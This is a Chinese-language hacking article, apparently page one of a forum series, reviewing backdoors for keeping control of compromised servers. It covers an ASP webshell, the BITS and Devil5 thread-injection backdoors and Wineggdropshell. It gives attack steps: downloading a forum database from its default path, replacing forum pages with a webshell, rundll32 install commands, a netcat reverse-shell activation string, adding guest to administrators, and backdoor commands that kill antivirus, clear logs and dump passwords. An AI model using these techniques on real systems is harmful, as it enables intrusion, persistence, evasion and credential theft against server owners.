精品后门程序介绍及思路分板

上面的“废话”想念大家都看累了吧？好，下面我们来看看现在网络中浒的后门究竟长什么模样想学习网络安全并想提高的朋友看清楚了哦，这可是让你的肉鸡逃不出你的五指山的大好途径！

1.网页后门
近段时间网络上针对系统漏洞的攻击事件渐渐少了，因为大家在认识到网络安全的重要性之后，最简单却又最有效的防护办法：升级，都被大家所认同，所以系统漏洞在以后的岁月中存活的周期会越来越短，而从最近的趋势来看，肢本漏洞已经渐渐取代了系统漏洞的地位，非常多的人开始研究起却本漏洞来，sql注入也开始成为各大安全站点首要关注热点，而说到脚本、网页后门当然就是不得不说的重头戏了，现在国内入侵的主流趋势是先利用某种脚本漏洞上传脚本后门，然后浏览服务器内安装和程序，找到提升权限的突破口，进而拿到服务器的系统权限。

现在asp、CGI、PHP这三个脚本大类在网络上的普遍运用带来了脚本后门在这三方面的发展，下面我们一一道来：
海阳顶端ASP木马

这是ASP脚本方面流传非常广的一个脚本后门了，在经过几次大的改革后，推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门，想念经常接解脚步本安全的朋友对这些都不会陌生。
类型：网页木马
使用范围：支持ASP、WEB访问
隐蔽程序：★★★★☆
使用难度：★☆☆☆☆
危害程序：★★★☆☆
查杀难度：★★★☆☆
现在的服务器系统配置都相对安全，公开的系统漏洞存在的机会很少，于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限（比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序），然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码，然后通过WEB访问这个程序，就能很方便地查阅服务器上的资料了，下面举个简单的便子（由于只是简单的介绍，下文便子不会太难或者太普遍，希望大家理解）。

运用举例
leadbbs2.77曾经风靡网络，它是个很典型的ASP论坛，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜级别的网络管理员总是喜欢默认安装，然后启用论坛，我们只需要很简单地在IE中输入：http://WWW.***.COM/BBS/DATA/LEADBBS.MDB就能够直接下载该论坛的数据库了，而且没有MD5加密哦！，我们直接找到管理员的账户和密码，然后登录论坛，到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码，然后执行GUEST权限的CMD命令，方便的上传/下载将定程序、远程执行程序等，这样一个隐藏的后门就建好了！取得服务器的SYSTEM权限就看大家自己的办法了。

一般来讲，海洋的功能是非常强大的，而且不容易被查杀（一个朋友采取的方式是：先利用某个脚本漏洞上传网页后门，再通过海洋上传另一个后门到隐蔽的路径，然后通过最后上传的后门来删除第一次上传的海洋，这样后门的存放路径就可以放得非常深了，普通管理员是很难发现的），如果管理员觉得自己可能中了这里边样的后门，可以利用论坛备份来恢复自己的页面系统，再配合系统日志、论坛日志等程序检查系统，发现可疑ASP文件打开看看海洋是很好识别的，再删除就可以了。

脚本方面的后门还有CGI和PHP两面三刀大类，使用原理都差不多，这里就不再多介绍，在黑防论坛也收录了这三种后门，大家可以下载后自己研究。

2.线程插入后门
首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说，即使受控制端安装的防火墙拥有“应用程序访问权限”的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设了！这种后门是现在非常主流的一种，很让防护的人头疼，因为对它的查杀比较困难，这种后门本身的功能比较强大，是“居中家旅行、入侵攻击”的必备品哦！

这类的典范就是国内提倡网络共享的小榕的BITS了，从它的推出以来，各类安全工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程中感到了方便。

BITS
类型：系统后门
使用范围：wind200/xp/2003
隐蔽程序：★★★★☆
使用难度：★★★☆☆
危害程序：★★★★☆
查杀难度：★★★★☆

BITS其实是BackgroundIntelligentTransferServicer的缩写，可以在不知不觉中实现另一种意义的典型的线程插入后门，有以下特点：进程管理器中看不到；平时没有端口，只是在系统中充当卧底的角色；提供正向连接和反向连接两种功能；仅适合用于windows200/xp/2003。

运用举例
首先我们用3389登录上肉鸡，确定你有SYSTEM的权限，将BITS.DLL拷贝到服务器上，执行CMD命令：
rundll32.exebits.dll,install
这样就激活了BIST，程序用这个特征的字符来辨认使用者，也就相当于你的密码了，然后卸载：rundll32.exeBITS.dll,Uninstall
这是最简单的使用，这个后门除了隐蔽性好外，还有两大特点是非常值得借鉴的：端口复用和正反向连接。虽然很多朋友经常听到这两个名词，但并不了解它们，端口复用就是利用系统正常的TCP端口通讯和控制，比如80、139等，这样的后门有个非常大的好处就是非常隐蔽，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问！另一个是反向连接，这个很常见，也是后门中一个经典思路，因为从服务器上主动方问外边是不被禁止的，很多很历害的防火墙就怕这点！

BITS的正向连接很简单，大家可以参考它的README，这种方式在服务器没有防火墙等措施的时候很管用，可以方便地连接，但是遇到有防火墙这样的方式就不灵了，得使用下面的反向连接方式：
在本地使用NC监听（如：nc-l-p1234）
用NC连接目标主机的任何一个防火墙允许的TCP端口（80/139/445……）
输入激活命令：hkfx@dancewithdolphin[rxell]:1.1.1.1:2222
目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。

devil5(魔鬼5号）
类型：系统后门
使用范围：win200/xp/2003
隐蔽程度：★★★★☆
使用难度：★★☆☆☆
危害程序：★★★★☆
查杀难度：★★★☆☆
同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。

运用举例：
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。

我们用TELNET连接上去，连接的格式是：TELNET***定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次执行程序也是分开的，必须要每次都有输入密码，比如我们丢掉了服务器和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上“>密码”就可以了：netlocalgroupadministratorsguest/add>hkfx，然后你又可以控制服务器了。

很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入线程可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具DELDEVIL5.exe，帮助防护者清理系统；而且它可以任意改名和绑定，使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。

另外，PortLessBackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。

3.扩展后门
所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。

Wineggdroupshell

类型：系统后门
使用范围：win2000/xp/2003
隐蔽程度：★★★★☆
使用难度：★★☆☆☆
危害程度：★★★★☆
查杀难度：★★★★☆
这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：进程管理，可查看，杀进程（支持用进程名或PID来杀进程）；注册表管现（查看，删除，增加等功能）；服务管理（停止，启动，枚举，配置，删除服务等功能）端口到程序关联功能（fport）；系统重启，关电源，注销等功能（reboot,poweroff,shutdown,logoff）；嗅探密码功能；安装终端，修改终端端口功能；端口重定向功能（多线程，并且可限制连接者IP）；HTTP服务功能（多线程，并且可限制连接者IP）；Socd5代理功能（支持两种不同方式验证，可限制连接者IP）；克隆账号，检测克隆账户功能（clone,checkclone）；加强了的Findpassword功能（可以得到所有登录用户，包括使用克隆账户远程登录用户密码）；HTTP代理（完全匿名，支持oicq、msn、mirc等程序）；其他辅助功能，http下载，删除日志，系统信息，恢复常用关联，枚举系统账户等。

当网络上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和“后门”的原始定义是有出入的：一旦你需要实现越多的功能，那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。

运用举例
在安装后门前，需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置，从10个具体配置中，包括了插入线程、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：
Fport:列出进程到端口的列表，用于发现系统中运行程序所对应的端口，可以用来检测常见的隐蔽的后门。
Reboot:重启系统，如果你上传并运行了其他后门程序，并需要重启机器以便让后门正常工作，那使用这个命令吧！

Shell:得到一个DosShell,这个不多讲了，直接得到服务器或者肉鸡上的cmdshell。
PskillPID或程序名：用于杀掉特定的服务，比如杀毒软件或者是防火墙。
Execute程序：在后台中执行程序，比如sniffer等。http://ip/文件名保存文件名：下载程序，直接从网上down一个后门到服务器上。
Installterm端口：在没有安装终端服务的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。
StopService/StartService:停止或者启动某个系统服务，比如telnet。
CleanEvent:删除系统日志。
Redirect:TCP数据转发，这个功能是后门程序中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用！
EnumService:列举所有自动启动的服务的资料，比如后门、木马。
RegEdit:进入注册表操作模式，熟悉注册表的使用者终于在后门中找到了福音！
Findpassword:得到所有登录用户密码，比我们常用的findpass功能可强多了。
……

总体来讲，Wineggdropshell是后门程序中很出彩的一个，它经过作者几次大规模的修改和升级，已经趋于稳定，功能的强大当然没得说，但是由于功能太强大，被查杀和怀疑是难以避免的，所以很多人在使用Wineggdropshell一段时间后就发现肉鸡飞了，其实是很正常的事，我你出不用气馁，其实用很简单的方法就可以很好地提高它的隐蔽性，下文将有说明。

相对于Wineggdropshell来说，独孤剑客的winshell在功能上就不那么全面了，但是笔者推荐新手更多的使用winshell而不是Wineggdropshell，因为winshell功能除了获得一个shell以外，只加入了一些重启、关闭服务器的命令，功能相对简单，但完全使用系统自带的cmd来执行命令，对系统学习和掌握也是非常有帮助的！
Winshell和wolf这两者都是国内早期顶尖的后门程序，程序的编制无疑是非常经典的，新手学习时使用这两款后门一定能让你明白很多系统相关东西，了解很多入侵思路和方法。

上一页  [1] [2] [3] 下一页